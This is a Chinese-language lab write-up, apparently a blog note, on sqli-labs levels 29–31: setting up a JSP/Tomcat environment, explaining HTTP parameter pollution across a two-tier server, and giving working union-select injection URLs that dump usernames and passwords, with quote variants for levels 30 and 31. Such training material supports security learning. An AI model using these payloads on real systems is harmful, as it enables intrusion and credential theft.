目录
(六)第二十九关到三十一关
这里只有这三关的笔记是因为这三关比较特殊,所以单独拿出来做笔记。
(1)搭建jsp环境
首先我们先打开29关,进行简单的注入,发现步骤和第一关几乎一模一样,可是这是不可能的,我们先打开网站,看到这关的标题为:被世界上最好的waf防护着。也可以证实这关并不是这样的。其实这关实在jsp环境下以来运行的。
我们首先打开sqli-labs的根目录,在目录最下方发现一个压缩包
就是这关tomcat-files,我们将他提取出来
这里面才是真正的第二十九关,然后我们下载JspStudy,我们进入官网下载
Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn)
进入后,点击下载JspStudy
注意下载路径中不能有中文,下载完成后,我们进行一些配置
点击里面的站点域名管理,新增
然后网站目录填你下载的JspStudy下的www路径,端口则不能与phpstudy冲突,我们选择一个好记得8080,然后保存设置并生成配置文件,之后重启一下服务器
之后将tomcat压缩的文件复制到JspStudy的www路径下
打开less-29的index.jsp,不管你用什么软件,能编辑就行
这里的URL换成你自己的路径,还有下面的else里面也一样,不知道的可以先打开浏览器看看正不正确
照着这样输出,能出来平常我们sqli-labs的页面就对了,然后我们打开
http://127.0.0.1:8080/sqli-labs/Less-29/ 
这个才是真正的29关。
(2)补充知识之服务器两层架构
MYSQL注入天书之服务器(两层)架构 - lcamry - 博客园 (cnblogs.com)
上面是一个参考链接。
http污染:jsp/tomcat 使用的是get getParameter("id") 获取到的是第一个值,php/apache 使用$_GET["id"] 获取的是第二个值,那么第一个id纯数字,第二个id注入就可以了
(3)第二十九关
法一:使用JspStudy
http://127.0.0.1/sqli-labs-master/Less-29/index.jsp?id=1&id=-2' union select 1,2,(select group_concat(concat_ws(0x7e,username,password)) from security.users)--+法二:如果搭建过程有问题或者最后无法使用JspStudy的话,也可以使用
http://127.0.0.1/sqli-labs-master/Less-29/login.php?id=1&id=-2' union select 1,2,(select group_concat(concat_ws(0x7e,username,password)) from security.users)--+本地login.php里面通过java_implimentation函数模拟了jsp取值方式。
(4)第三十关
其实就是把单引号改为双引号就可以了。
(5)第三十一关
将单引号改为 ") 即可。
扫一扫
1027
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
